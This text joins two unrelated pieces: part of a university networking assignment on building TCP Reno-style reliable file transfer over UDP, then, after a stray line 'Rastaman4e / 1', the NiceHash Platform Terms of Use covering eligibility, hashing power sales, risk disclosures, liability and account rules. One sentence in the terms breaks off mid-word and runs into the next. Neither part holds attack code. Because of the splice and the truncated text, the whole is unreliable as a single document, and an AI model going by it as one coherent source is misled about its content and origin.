This requires that a routing socket be created, for which we need superuser privilege. Alternatively, we might want to dump out the routing table, using the sysctl function for example (see Section 18.4), and examine it directly. Unfortunately, Solaris 2.10 does not support sysctl. Furthermore, note that there is a slight problem with the address 130.245.1.123/24 assigned to compserv3 (see rightmost column of file hosts, and note that this particular compserv3 address “overlaps” with the 130.245.1.x/28 addresses in that same column assigned to compserv1, compserv2 & compserv4). In particular, if the client is running on compserv3 and the server on any of the other three compservs, and if that server node is also being identified to the client by its /28 (rather than its /24) address, then the client will get a “false positive” when it tests as to whether the server node is local or not. In other words, the client will deem the server node to be local, whereas in fact it should not be considered local. Because of this, it is perhaps best simply not to use compserv3 to run the client (but it is o.k. to use it to run the server). Finally, using MSG_DONTROUTE where possible would seem to gain us efficiency, in as much as the kernel does not need to consult the routing table for every datagram sent. But, in fact, that is not so. Recall that one effect of connect with UDP sockets is that routing information is obtained by the kernel at the time the connect is issued. That information is cached and used for subsequent sends from the connected socket (see p.255).

The client now creates a UDP socket and calls bind on IPclient, with 0 as the port number. This will cause the kernel to bind an ephemeral port to the socket. After the bind, use the getsockname function (Section 4.10) to obtain IPclient and the ephemeral port number that has been assigned to the socket, and print that information out on stdout, with an appropriate message and appropriately formatted.
The client connects its socket to IPserver and the well-known port number of the server. After the connect, use the getpeername function (Section 4.10) to obtain IPserver and the well-known port number of the server, and print that information out on stdout, with an appropriate message and appropriately formatted. The client sends a datagram to the server giving the filename for the transfer. This send needs to be backed up by a timeout in case the datagram is lost. Note that the incoming datagram from the client will be delivered to the server at the socket to which the destination IP address that the datagram is carrying has been bound. Thus, the server can obtain that address (it is, of course, IPserver) and thereby achieve what IP_RECVDESTADDR would have given us had it been available. Furthermore, the server process can obtain the IP address (this will, of course, be IPclient) and ephemeral port number of the client through the recvfrom or recvmsg functions. The server forks off a child process to handle the client. The server parent process goes back to the select to listen for new clients. Hereafter, and unless otherwise stated, whenever we refer to the ‘server’, we mean the server child process handling the client’s file transfer, not the server parent process. Typically, the first thing the server child would be expected to do is to close all sockets it ‘inherits’ from its parent. However, this is not the case with us. The server child does indeed close the sockets it inherited, but not the socket on which the client request arrived. It leaves that socket open for now. Call this socket the ‘listening’ socket. The server (child) then checks if the client host is local to its (extended) Ethernet. If so, all its communication to the client is to occur as MSG_DONTROUTE (or SO_DONTROUTE socket option). If IPserver (obtained in 5. above) is the loopback address, then we are done. Otherwise, the server has to proceed with the following step. 
Use the array of structures you built in 1. above, together with the addresses IPserver and IPclient to determine if the client is ‘local’. Print out on stdout the results of your examination, as to whether the client host is ‘local’ or not. The server (child) creates a UDP socket to handle file transfer to the client. Call this socket the ‘connection’ socket. It binds the socket to IPserver, with port number 0 so that its kernel assigns an ephemeral port. After the bind, use the getsockname function (Section 4.10) to obtain IPserver and the ephemeral port number that has been assigned to the socket, and print that information out on stdout, with an appropriate message and appropriately formatted. The server then connects this ‘connection’ socket to the client’s IPclient and ephemeral port number. The server now sends the client a datagram, in which it passes it the ephemeral port number of its ‘connection’ socket as the data payload of the datagram. This datagram is sent using the ‘listening’ socket inherited from its parent, otherwise the client (whose socket is connected to the server’s ‘listening’ socket at the latter’s well-known port number) will reject it. This datagram must be backed up by the ARQ mechanism, and retransmitted in the event of loss. Note that if this datagram is indeed lost, the client might well time out and retransmit its original request message (the one carrying the file name). In this event, you must somehow ensure that the parent server does not mistake this retransmitted request for a new client coming in, and spawn off yet another child to handle it. How do you do that? It is potentially more involved than it might seem. I will be discussing this in class, as well as ‘race’ conditions that could potentially arise, depending on how you code the mechanisms I present. 
When the client receives the datagram carrying the ephemeral port number of the server’s ‘connection’ socket, it reconnects its socket to the server’s ‘connection’ socket, using IPserver and the ephemeral port number received in the datagram (see p.254). It now uses this reconnected socket to send the server an acknowledgment. Note that this implies that, in the event of the server timing out, it should retransmit two copies of its ‘ephemeral port number’ message, one on its ‘listening’ socket and the other on its ‘connection’ socket (why?). When the server receives the acknowledgment, it closes the ‘listening’ socket it inherited from its parent. The server can now commence the file transfer through its ‘connection’ socket. The net effect of all these binds and connects at server and client is that no ‘outsider’ UDP datagram (broadcast, multicast, unicast - fortuitously or maliciously) can now intrude on the communication between server and client. Starting with the first datagram sent out, the client behaves as follows. Whenever a datagram arrives, or an ACK is about to be sent out (or, indeed, the initial datagram to the server giving the filename for the transfer), the client uses some random number generator function random() (initialized by the client.in argument value seed) to decide with probability p (another client.in argument value) if the datagram or ACK should be discarded by way of simulating transmission loss across the network. (I will briefly discuss in class how you do this.) Adding reliability to UDP The mechanisms you are to implement are based on TCP Reno. These include : Reliable data transmission using ARQ sliding-windows, with Fast Retransmit. Flow control via receiver window advertisements. 
Congestion control that implements:
Slow Start
Congestion Avoidance (‘Additive-Increase/Multiplicative Decrease’ – AIMD)
Fast Recovery (but without the window-inflation aspect of Fast Recovery)

Only some, and by no means all, of the details for these are covered below. The rest will be presented in class, especially those concerning flow control and TCP Reno’s congestion control mechanisms in general: Slow Start, Congestion Avoidance, Fast Retransmit and Fast Recovery.

Implement a timeout mechanism on the sender (server) side. This is available to you from Stevens, Section 22.5. Note, however, that you will need to modify the basic driving mechanism of Figure 22.7 appropriately since the situation at the sender side is not a repetitive cycle of send-receive, but rather a straightforward progression of send-send-send-send-... Also, modify the RTT and RTO mechanisms of Section 22.5 as specified below. I will be discussing the details of these modifications and the reasons for them in class.

Modify function rtt_stop (Fig. 22.13) so that it uses integer arithmetic rather than floating point. This will entail your also having to modify some of the variable and function parameter declarations throughout Section 22.5 from float to int, as appropriate.

In the unprtt.h header file (Fig. 22.10) set:
RTT_RXTMIN to 1000 msec. (1 sec. instead of the current value 3 sec.)
RTT_RXTMAX to 3000 msec. (3 sec. instead of the current value 60 sec.)
RTT_MAXNREXMT to 12 (instead of the current value 3)

In function rtt_timeout (Fig. 22.14), after doubling the RTO in line 86, pass its value through the function rtt_minmax of Fig. 22.11 (somewhat along the lines of what is done in line 77 of rtt_stop, Fig. 22.13).
Finally, note that with the modification to integer calculation of the smoothed RTT and its variation, and given the small RTT values you will experience on the cs / sbpub network, these calculations should probably now be done on a millisecond or even microsecond scale (rather than in seconds, as is the case with Stevens’ code). Otherwise, small measured RTTs could show up as 0 on a scale of seconds, yielding a negative result when we subtract the smoothed RTT from the measured RTT (line 72 of rtt_stop, Fig. 22.13). Report the details of your modifications to the code of Section 22.5 in the ReadMe file which you hand in with your code. We need to have a sender sliding window mechanism for the retransmission of lost datagrams; and a receiver sliding window in order to ensure correct sequencing of received file contents, and some measure of flow control. You should implement something based on TCP Reno’s mechanisms, with cumulative acknowledgments, receiver window advertisements, and a congestion control mechanism I will explain in detail in class. For a reference on TCP’s mechanisms generally, see W. Richard Stevens, TCP/IP Illustrated, Volume 1 , especially Sections 20.2 - 20.4 of Chapter 20 , and Sections 21.1 - 21.8 of Chapter 21 . Bear in mind that our sequence numbers should count datagrams, not bytes as in TCP. Remember that the sender and receiver window sizes have to be set according to the argument values in client.in and server.in, respectively. Whenever the sender window becomes full and so ‘locks’, the server should print out a message to that effect on stdout. Similarly, whenever the receiver window ‘locks’, the client should print out a message on stdout. Be aware of the potential for deadlock when the receiver window ‘locks’. This situation is handled by having the receiver process send a duplicate ACK which acts as a window update when its window opens again (see Figure 20.3 and the discussion about it in TCP/IP Illustrated). 
However, this is not enough, because ACKs are not backed up by a timeout mechanism in the event they are lost. So we will also need to implement a persist timer driving window probes in the sender process (see Sections 22.1 & 22.2 in Chapter 22 of TCP/IP Illustrated). Note that you do not have to worry about the Silly Window Syndrome discussed in Section 22.3 of TCP/IP Illustrated since the receiver process consumes ‘full sized’ 512-byte messages from the receiver buffer (see 3. below). Report on the details of the ARQ mechanism you implemented in the ReadMe file you hand in. Indeed, you should report on all the TCP mechanisms you implemented in the ReadMe file, both the ones discussed here, and the ones I will be discussing in class. Make your datagram payload a fixed 512 bytes, inclusive of the file transfer protocol header (which must, at the very least, carry: the sequence number of the datagram; ACKs; and advertised window notifications). The client reads the file contents in its receive buffer and prints them out on stdout using a separate thread. This thread sits in a repetitive loop till all the file contents have been printed out, doing the following. It samples from an exponential distribution with mean µ milliseconds (read from the client.in file), sleeps for that number of milliseconds; wakes up to read and print all in-order file contents available in the receive buffer at that point; samples again from the exponential distribution; sleeps; and so on. The formula -1 × µ × ln( random( ) ) , where ln is the natural logarithm, yields variates from an exponential distribution with mean µ, based on the uniformly-distributed variates over ( 0 , 1 ) returned by random(). 
Note that you will need to implement some sort of mutual exclusion/semaphore mechanism on the client side so that the thread that sleeps and wakes up to consume from the receive buffer is not updating the state variables of the buffer at the same time as the main thread reading from the socket and depositing into the buffer is doing the same. Furthermore, we need to ensure that the main thread does not effectively monopolize the semaphore (and thus lock out for prolonged periods of time) the sleeping thread when the latter wakes up. See the textbook, Section 26.7, ‘Mutexes: Mutual Exclusion’, pp.697-701. You might also find Section 26.8, ‘Condition Variables’, pp.701-705, useful.

You will need to devise some way by which the sender can notify the receiver when it has sent the last datagram of the file transfer, without the receiver mistaking that EOF marker as part of the file contents. (Also, note that the last data segment could be a “short” segment of less than 512 bytes – your client needs to be able to handle this correctly somehow.) When the sender receives an ACK for the last datagram of the transfer, the (child) server terminates. The parent server has to take care of cleaning up zombie children. Note that if we want a clean closing, the client process cannot simply terminate when the receiver ACKs the last datagram. This ACK could be lost, which would leave the (child) server process ‘hanging’, timing out, and retransmitting the last datagram. TCP attempts to deal with this problem by means of the TIME_WAIT state. You should have your receiver process behave similarly, sticking around in something akin to a TIME_WAIT state in case it needs to retransmit the ACK. In the ReadMe file you hand in, report on how you dealt with the issues raised here: sender notifying receiver of the last datagram, clean closing, and so on.

Output

Some of the output required from your program has been described in the section Operation above.
I expect you to provide further output – clear, well-structured, well-laid-out, concise but sufficient and helpful – in the client and server windows by means of which we can trace the correct evolution of your TCP’s behaviour in all its intricacies: information (e.g., sequence number) on datagrams and acks sent and dropped, window advertisements, datagram retransmissions (and why: dup acks or RTO); entering/exiting Slow Start and Congestion Avoidance, ssthresh and cwnd values; sender and receiver windows locking/unlocking; etc., etc. The onus is on you to convince us that the TCP mechanisms you implemented are working correctly. Too many students do not put sufficient thought, creative imagination, time or effort into this. It is not the TA’s nor my responsibility to sit staring at an essentially blank screen, trying to summon up our paranormal psychology skills to figure out if your TCP implementation is really working correctly in all its very intricate aspects, simply because the transferred file seems to be printing o.k. in the client window. Nor is it our responsibility to strain our eyes and our patience wading through a mountain of obscure, ill-structured, hyper-messy, debugging-style output because, for example, your effort-conserving concept of what is ‘suitable’ is to dump your debugging output on us, relevant, irrelevant, and everything in between.
Rastaman4e / 1
NICEHASH PLATFORM TERMS OF USE AND NICEHASH MINING TERMS OF SERVICE

PLEASE READ THESE NICEHASH PLATFORM TERMS OF USE AND NICEHASH MINING TERMS OF SERVICE (“Terms”) CAREFULLY BEFORE USING THE PLATFORM OR SERVICES DESCRIBED HEREIN. BY SELECTING “I AGREE”, ACCESSING THE PLATFORM, USING NICEHASH MINING SERVICES OR DOWNLOADING OR USING NICEHASH MINING SOFTWARE, YOU ARE ACKNOWLEDGING THAT YOU HAVE READ THESE TERMS, AS AMENDED FROM TIME TO TIME, AND YOU ARE AGREEING TO BE BOUND BY THEM. IF YOU DO NOT AGREE TO THESE TERMS, OR ANY SUBSEQUENT AMENDMENTS, CHANGES OR UPDATES, DO NOT ACCESS THE PLATFORM, USE NICEHASH MINING SERVICES OR USE THE NICEHASH MINING SOFTWARE.

GENERAL

These Terms apply to users of the NiceHash Platform (“Platform”) and NiceHash Mining Services (“Services”) which are provided to you by NICEHASH Ltd, a company organized and existing under the laws of the British Virgin Islands, with registered address at Intershore Chambers, Road Town, Tortola, British Virgin Islands, registration number: 2048669, hereinafter referred to as “NiceHash”, as well as “we” or “us”.

ELIGIBILITY

By using the NiceHash platform and NiceHash Mining Services, you represent and warrant that you:

are at least Minimum Age and have capacity to form a binding contract;
have not previously been suspended or removed from the NiceHash Platform;
have full power and authority to enter into this agreement and in doing so will not violate any other agreement to which you are a party;
are not furthering, performing, undertaking, engaging in, aiding, or abetting any unlawful activity through your relationship with us, through your use of NiceHash Platform or use of NiceHash Mining Services;
will not use NiceHash Platform or NiceHash Mining Services if any applicable laws in your country prohibit you from doing so in accordance with these Terms.
We reserve the right to terminate your access to the NiceHash Platform and Mining Services for any reason and in our sole and absolute discretion. Use of NiceHash Platform and Mining Services is void where prohibited by applicable law. Depending on your country of residence or incorporation or registered office, you may not be able to use all the functions of the NiceHash Platform or services provided therein. It is your responsibility to follow the rules and laws in your country of residence and/or country from which you access the NiceHash Platform. DEFINITIONS NiceHash Platform means a website located on the following web address: www.nicehash.com. NiceHash Mining Services mean all services provided by NiceHash, namely the provision of the NiceHash Platform, NiceHash Hashing power marketplace, NiceHash API, NiceHash OS, NiceHash Mining Software including licence for NiceHash Miner, NiceHash Private Endpoint, NiceHash Account, NiceHash mobile apps, and all other software products, applications and services associated with these products, except for the provision of NiceHash Exchange Services. NiceHash Exchange Service means a service which allows trading of digital assets in the form of digital tokens or cryptographic currency for our users by offering them a trading venue, helping them find a trading counterparty and providing the means for transaction execution. NiceHash Exchange Services are provided by NICEX Ltd and accessible at the NiceHash Platform under NiceHash Exchange Terms of Service. Hashing power marketplace means an infrastructure provided by the NiceHash which enables the Hashing power providers to point their rigs towards NiceHash stratum servers where Hashing power provided by different Hashing power providers is gathered and sold as generic Hashing power to the Hashing power buyers. 
Hashing power buyer means a legal entity or individual who buys the gathered and generic hashing power on the Hashing power marketplace from undefined Hashing power providers. Hashing power provider means a legal entity or individual who sells his hashing power on the Hashing power marketplace to undefined Hashing power buyers. NiceHash Mining Software means NiceHash Miner and any other software available via the NiceHash Platform. NiceHash Miner means a comprehensive software with graphical user interface and web interface, owned by NiceHash. NiceHash Miner is a process manager software which enables the Hashing power providers to point their rigs towards NiceHash stratum servers and sell their hashing power to the Hashing power buyers. NiceHash Miner also means any and all of its code, compilations, updates, upgrades, modifications, error corrections, patches and bug fixes and similar. NiceHash Miner does not mean third party software compatible with NiceHash Miner (Third Party Plugins and Miners). NiceHash QuickMiner means a software accessible at https://www.nicehash.com/quick-miner which enables Hashing power providers to point their PCs or rigs towards NiceHash stratum servers and sell their hashing power to the Hashing power buyers. NiceHash QuickMiner is intended as a tryout tool. Hashing power rig means all hardware which produces hashing power that represents computation power which is required to calculate the hash function of different type of cryptocurrency. Secondary account is an account managed by third party from which the Account holder deposits funds to his NiceHash Wallet or/and to which the Account holder withdraws funds from his NiceHash Wallet. Stratum is a lightweight mining protocol: https://slushpool.com/help/manual/stratum-protocol. NiceHash Account means an online account available on the NiceHash Platform and created by completing the registration procedure on the NiceHash Platform. 
Account holder means an individual or legal entity who completes the registration procedure and successfully creates the NiceHash Account. Minimum Age means 18 years old or older, if in order for NiceHash to lawfully provide the Services to you without parental consent (including using your personal data). NiceHash Wallet means a wallet created automatically for the Account holder and provided by the NiceHash Wallet provider. NiceHash does not hold funds on behalf of the Account holder but only transfers Account holder’s requests regarding the NiceHash Wallet transaction to the NiceHash Wallet provider who executes the requested transactions. In this respect NiceHash only processes and performs administrative services related to the payments regarding the NiceHash Mining Services and NiceHash Exchange Services, if applicable. NiceHash Wallet provider is a third party which on the behalf of the Account holder provides and manages the NiceHash Wallet, holds, stores and transfers funds and hosts NiceHash Wallet. For more information about the NiceHash Wallet provider, see the following website: https://www.bitgo.com/. Blockchain network is a distributed database that is used to maintain a continuously growing list of records, called blocks. Force Majeure Event means any governmental or relevant regulatory regulations, acts of God, war, riot, civil commotion, fire, flood, or any disaster or an industrial dispute of workers unrelated to you or NiceHash. Any act, event, omission, happening or non-happening will only be considered Force Majeure if it is not attributable to the wilful act, neglect or failure to take reasonable precautions of the affected party, its agents, employees, consultants, contractors and sub-contractors. SALE AND PURCHASE OF HASHING POWER Hashing power providers agree to sell and NiceHash agrees to proceed Hashing power buyers’ payments for the provided hashing power on the Hashing power marketplace, on the Terms set forth herein. 
According to the applicable principle get-paid-per-valid-share (pay as you go principle) Hashing power providers will be paid only for validated and accepted hashing power to their NiceHash Wallet or other wallet, as indicated in Account holder’s profile settings or in stratum connection username. In some cases, no Hashing power is sent to Hashing power buyers or is accepted by NiceHash Services, even if Hashing power is generated on the Hashing power rigs. These cases include usage of slower hardware as well as software, hardware or network errors. In these cases, Hashing power providers are not paid for such Hashing power. Hashing power buyers agree to purchase and NiceHash agrees to process the order and forward the purchased hashing power on the Hashing power marketplace, on the Terms set forth herein. According to the applicable principle pay-per-valid-share (pay as you go principle) Hashing power buyers will pay from their NiceHash Wallet only for the hashing power that was validated by our engine. When connection to the mining pool which is selected on the Hashing power order is lost or when an order is cancelled during its lifetime, Hashing power buyer pays for an additional 10 seconds worth of hashing power. Hashing power order is charged for extra hashing power when the mining pool which is selected on the Hashing power order generates rapid mining work changes and/or rapid mining job switching. All payments including any fees will be processed in crypto currency and NiceHash does not provide an option to sell and purchase the hashing power in fiat currency. RISK DISCLOSURE If you choose to use NiceHash Platform, Services and NiceHash Wallet, it is important that you remain aware of the risks involved, that you have adequate technical resources and knowledge to bear such risks and that you monitor your transactions carefully.
General risk You understand that NiceHash Platform and Services, blockchain technology, Bitcoin, all other cryptocurrencies and cryptotokens, proof of work concept and other associated and related technologies are new and untested and outside of NiceHash’s control. You acknowledge that there are major risks associated with these technologies. In addition to the risks disclosed below, there are risks that NiceHash cannot foresee and it is unreasonable to believe that such risk could have been foreseeable. The performance of NiceHash’s obligation under these Terms will terminate if market or technology circumstances change to such an extent that (i) these Terms clearly no longer comply with NiceHash’s expectations, (ii) it would be unjust to enforce NiceHash’s obligations in the general opinion or (iii) NiceHash’s obligation becomes impossible. NiceHash Account abuse You acknowledge that there is risk associated with the NiceHash Account abuse and that you have been fully informed and warned about it. The funds stored in the NiceHash Wallet may be disposed by third party in case the third party obtains the Account holder’s login credentials. The Account holder shall protect his login credentials and his electronic devices where the login credentials are stored against unauthorized access. Regulatory risks You acknowledge that there is risk associated with future legislation which may restrict, limit or prohibit certain aspects of blockchain technology which may also result in restriction, limitation or prohibition of NiceHash Services and that you have been fully informed and warned about it. Risk of hacking You acknowledge that there is risk associated with hacking NiceHash Services and NiceHash Wallet and that you have been fully informed and warned about it. 
Hacker or other groups or organizations may attempt to interfere with NiceHash Services or NiceHash Wallet in any way, including without limitation denial of services attacks, Sybil attacks, spoofing, smurfing, malware attacks, mining attacks or consensus-based attacks. Cryptocurrency risk You acknowledge that there is risk associated with the cryptocurrencies which are used as payment method and that you have been fully informed and warned about it. Cryptocurrencies are prone to, but not limited to, value volatility, transaction costs and times uncertainty, lack of liquidity, availability, regulatory restrictions, policy changes and security risks. NiceHash Wallet risk You acknowledge that there is risk associated with funds held on the NiceHash Wallet and that you have been fully informed and warned about it. You acknowledge that NiceHash Wallet is provided by NiceHash Wallet provider and not NiceHash. You acknowledge and agree that NiceHash shall not be responsible for any NiceHash Wallet provider’s services, including their accuracy, completeness, timeliness, validity, copyright compliance, legality, decency, quality or any other aspect thereof. NiceHash does not assume and shall not have any liability or responsibility to you or any other person or entity for any Hash Wallet provider’s services. Hash Wallet provider’s services and links thereto are provided solely as a convenience to you and you access and use them entirely at your own risk and subject to NiceHash Wallet provider’s terms and conditions. Since the NiceHash Wallet is a cryptocurrency wallet all funds held on it are entirely uninsured in contrast to the funds held on the bank account or other financial institutions which are insured. 
Connection risk You acknowledge that there are risks associated with usage of NiceHash Services which are provided through the internet including, but not limited to, the failure of hardware, software, configuration and internet connections and that you have been fully informed and warned about it. You acknowledge that NiceHash will not be responsible for any configuration, connection or communication failures, disruptions, errors, distortions or delays you may experience when using NiceHash Services, however caused. Hashing power provision risk You acknowledge that there are risks associated with the provisions of the hashing power which is provided by the Hashing power providers through the Hashing power marketplace and that you have been fully informed and warned about it. You acknowledge that NiceHash does not provide the hashing power but only provides the Hashing power marketplace as a service. Hashing power providers’ Hashing power rigs are new and untested and outside of NiceHash’s control. There is a major risk that the Hashing power rigs (i) will stop providing hashing power, (ii) will provide hashing power in an unstable way, (iii) will be wrongly configured or (iv) provide insufficient speed of the hashing power. Hashing power rigs as hardware could be subject of damage, errors, electricity outage, misconfiguration, connection or communication failures and other malfunctions. NiceHash will not be responsible for operation of Hashing power rigs and its provision of hashing power. By submitting a Hashing power order you agree to Hashing power no-refund policy – all shares forwarded to mining pool, selected on the Hashing power order are final and non-refundable. Hashing power profitability risk You acknowledge that there is risk associated with the profitability of the hashing power provision and that you have been fully informed and warned about it. 
You acknowledge that all Hashing power rig’s earning estimates and profitability calculations on NiceHash Platform are only for informational purposes and were made based on the Hashing power rigs set up in the test environments. NiceHash does not warrant that your Hashing power rigs would achieve the same profitability or earnings as calculated on NiceHash Platform. There is risk that your Hashing power rig would not produce desired hashing power quantity and quality and that your produced hashing power would differentiate from the hashing power produced by our Hashing power rigs set up in the test environments. There is risk that your Hashing power rigs would not be as profitable as our Hashing power rigs set up in the test environments or would not be profitable at all. WARRANTIES NiceHash Platform and Mining Services are provided on the “AS IS” and “AS AVAILABLE” basis, including all faults and defects. To the maximum extent permitted by applicable law, NiceHash makes no representations and warranties and you waive all warranties of any kind. Particularly, without limiting the generality of the foregoing, the NiceHash makes no representations and warranties, whether express, implied, statutory or otherwise regarding NiceHash Platform and Mining Services or other services related to NiceHash Platform and provided by third parties, including any warranty that such services will be uninterrupted, harmless, secure or not corrupt or damaged, meet your requirements, achieve any intended results, be compatible or work with any other software, applications, systems or services, meet any performance or error free or that any errors or defects can or will be corrected. 
Additionally NiceHash makes no representations and warranties, whether express, implied, statutory or otherwise of merchantability, suitability, reliability, availability, timeliness, accuracy, satisfactory quality, fitness for a particular purpose or quality, title and non-infringement with respect to any of the Mining Services or other services related to NiceHash Platform and provided by third parties, or quiet enjoyment and any warranties arising out of any course of dealing, course of performance, trade practice or usage of NiceHash Platform and Mining Services including information, content and material contained therein. Especially NiceHash makes no representations and warranties, whether express, implied, statutory or otherwise regarding any payment services and systems, NiceHash Wallet which is provided by third party or any other financial services which might be related to the NiceHash Platform and Mining Services. You acknowledge that you do not rely on and have not been induced to accept the NiceHash Platform and Mining Services according to these Terms on the basis of any warranties, representations, covenants, undertakings or any other statement whatsoever, other than expressly set out in these Terms that neither the NiceHash nor any of its respective agents, officers, employees or advisers have given any such warranties, representations, covenants, undertakings or other statements. 
LIABILITY NiceHash and their respective officers, employees or agents will not be liable to you or anyone else, to the maximum extent permitted by applicable law, for any damages of any kind, including, but not limited to, direct, consequential, incidental, special or indirect damages (including but not limited to lost profits, trading losses or damages that result from use or loss of use of NiceHash Services or NiceHash Wallet), even if NiceHash has been advised of the possibility of such damages or losses, including, without limitation, from the use or attempted use of NiceHash Platform and Mining Services, NiceHash Wallet or other related websites or services. NiceHash does not assume any obligations to users in connection with the unlawful alienation of Bitcoins, which occurred on 6. 12. 2017 with NICEHASH, d. o. o., and has been fully reimbursed with the completion of the NiceHash Repayment Program. NiceHash will not be responsible for any compensation, reimbursement, or damages arising in connection with: (i) your inability to use the NiceHash Platform and Mining Services, including without limitation as a result of any termination or suspension of the NiceHash Platform or these Terms, power outages, maintenance, defects, system failures, mistakes, omissions, errors, defects, viruses, delays in operation or transmission or any failure of performance, (ii) the cost of procurement of substitute goods or services, (iii) any of your investments, expenditures, or commitments in connection with these Terms or your use of or access to the NiceHash Platform and Mining Services, (iv) your reliance on any information obtained from NiceHash, (v) Force Majeure Event, communications failure, theft or other interruptions or (vi) any unauthorized access, alteration, deletion, destruction, damage, loss or failure to store any data, including records, private key or other credentials, associated with NiceHash Platform and Mining Services or NiceHash Wallet.
Our aggregate liability (including our directors, members, employees and agents), whether in contract, warranty, tort (including negligence, whether active, passive or imputed), product liability, strict liability or other theory, arising out of or relating to the use of NiceHash Platform and Mining Services, or inability to use the Platform and Services under these Terms or under any other document or agreement executed and delivered in connection herewith or contemplated hereby, shall in any event not exceed 100 EUR per user. You will defend, indemnify, and hold NiceHash harmless and all respective employees, officers, directors, and representatives from and against any claims, demand, action, damages, loss, liabilities, costs and expenses (including reasonable attorney fees) arising out of or relating to (i) any third-party claim concerning these Terms, (ii) your use of, or conduct in connection with, NiceHash Platform and Mining Services, (iii) any feedback you provide, (iv) your violation of these Terms, (v) or your violation of any rights of any other person or entity. If you are obligated to indemnify us, we will have the right, in our sole discretion, to control any action or proceeding (at our expense) and determine whether we wish to settle it. If we are obligated to respond to a third-party subpoena or other compulsory legal order or process described above, you will also reimburse us for reasonable attorney fees, as well as our employees’ and contractors’ time and materials spent responding to the third-party subpoena or other compulsory legal order or process at reasonable hourly rates. The Services and the information, products, and services included in or available through the NiceHash Platform may include inaccuracies or typographical errors. Changes are periodically added to the information herein. Improvements or changes on the NiceHash Platform can be made at any time. 
NICEHASH ACCOUNT The registration of the NiceHash Account is made through the NiceHash Platform, where you are required to enter your email address and password in the registration form. After successful completion of registration, the confirmation email is sent to you. After you confirm your registration by clicking on the link in the confirmation email the NiceHash Account is created. NiceHash will send you proof of completed registration once the process is completed. When you create NiceHash Account, you agree to (i) create a strong password that you change frequently and do not use for any other website, (ii) implement reasonable and appropriate measures designed to secure access to any device which has access to your email address associated with your NiceHash Account and your username and password for your NiceHash Account, (iii) maintain the security of your NiceHash Account by protecting your password and by restricting access to your NiceHash Account; (iv) promptly notify us if you discover or otherwise suspect any security breaches related to your NiceHash Account so we can take all required and possible measures to secure your NiceHash Account and (v) take responsibility for all activities that occur under your NiceHash Account and accept all risks of any authorized or unauthorized access to your NiceHash Account, to the maximum extent permitted by law. Losing access to your email, registered at NiceHash Platform, may also mean losing access to your NiceHash Account. You may not be able to use the NiceHash Platform or Mining Services, execute withdrawals and other security sensitive operations until you regain access to your email address, registered at NiceHash Platform. If you wish to change the email address linked to your NiceHash Account, we may ask you to complete a KYC procedure for security purposes. This step serves solely for the purpose of identification in the process of regaining access to your NiceHash Account. 
Once the NiceHash Account is created a NiceHash Wallet is automatically created for the NiceHash Account when the request for the first deposit to the NiceHash Wallet is made by the user. Account holder’s NiceHash Wallet is generated by NiceHash Wallet provider. Account holder is strongly suggested to enhance the security of his NiceHash Account by adding an additional security step of Two-factor authentication (hereinafter “2FA”) when logging into his account, withdrawing funds from his NiceHash Wallet or placing a new order. Account holder can enable this security feature in the settings of his NiceHash Account. In the event of losing or changing 2FA code, we may ask the Account holder to complete a KYC procedure for security reasons. This step serves solely for the purpose of identification in the process of reactivating Account holder’s 2FA and it may be subject to an a In order to use certain functionalities of the NiceHash Platform, such as paying for the acquired hashing power, users must deposit funds to the NiceHash Wallet, as the payments for the hashing power could be made only through NiceHash Wallet. Hashing power providers have two options to get paid for the provided hashing power: (i) by using NiceHash Wallet to receive the payments or (ii) by providing other Bitcoin address where the payments shall be received to. Hashing power providers provide their Bitcoin address to NiceHash by providing such details via Account holder’s profile settings or in a form of a stratum username while connecting to NiceHash stratum servers. Account holder may load funds on his NiceHash Wallet from his Secondary account. Account holder may be charged fees by the Secondary account provider or by the blockchain network for such transaction. NiceHash is not responsible for any fees charged by Secondary account providers or by the blockchain network or for the management and security of the Secondary accounts.
Account holder is solely responsible for his use of Secondary accounts and Account holder agrees to comply with all terms and conditions applicable to any Secondary accounts. The timing associated with a load transaction will depend in part upon the performance of Secondary accounts providers, the performance of blockchain network and performance of the NiceHash Wallet provider. NiceHash makes no guarantee regarding the amount of time it may take to load funds on to NiceHash Wallet. NiceHash Wallet shall not be used by Account holders to keep, save and hold funds for longer period and also not for executing other transactions which are not related to the transactions regarding the NiceHash Platform. The NiceHash Wallet shall be used exclusively and only for current and ongoing transactions regarding the NiceHash Platform. Account holders shall promptly withdraw any funds kept on the NiceHash Wallet that will not be used and are not intended for the reasons described earlier. Commission fees may be charged by the NiceHash Wallet provider, by the blockchain network or by NiceHash for any NiceHash Wallet transactions. Please refer to the NiceHash Platform, for more information about the commission fees for NiceHash Wallet transactions which are applicable at the time of the transaction. NiceHash reserves the right to change these commission fees according to the provisions to change these Terms at any time for any reason. You have the right to use the NiceHash Account only in compliance with these Terms and other commercial terms and principles published on the NiceHash Platform. In particular, you must observe all regulations aimed at ensuring the security of funds and financial transactions. 
Provided that the balance of funds in your NiceHash Wallet is greater than any minimum balance requirements needed to satisfy any of your open orders, you may withdraw from your NiceHash Wallet any amount of funds, up to the total amount of funds in your NiceHash Wallet in excess of such minimum balance requirements, to Secondary Account, less any applicable withdrawal fees charged by NiceHash or by the blockchain network for such transaction. Withdrawals are not processed instantly and may be grouped with other withdrawal requests. Some withdrawals may require additional verification information which you will have to provide in order to process the withdrawal. It may take up to 24 hours before withdrawal is fully processed and distributed to the Blockchain network. Please refer to the NiceHash Platform for more information about the withdrawal fees and withdrawal processing. NiceHash reserves the right to change these fees according to the provisions to change these Terms at any time for any reason. You have the right to close the NiceHash Account. In case you have funds on your NiceHash Wallet you should withdraw funds from your account prior to requesting NiceHash Account closure. After we receive your NiceHash Account closure request we will deactivate your NiceHash Account. You can read more about closing the NiceHash Account in our Privacy Policy. Your NiceHash Account may be deactivated due to your inactivity. Your NiceHash account may be locked and a mandatory KYC procedure is applied for security reasons, if it has been more than 6 months since your last login.
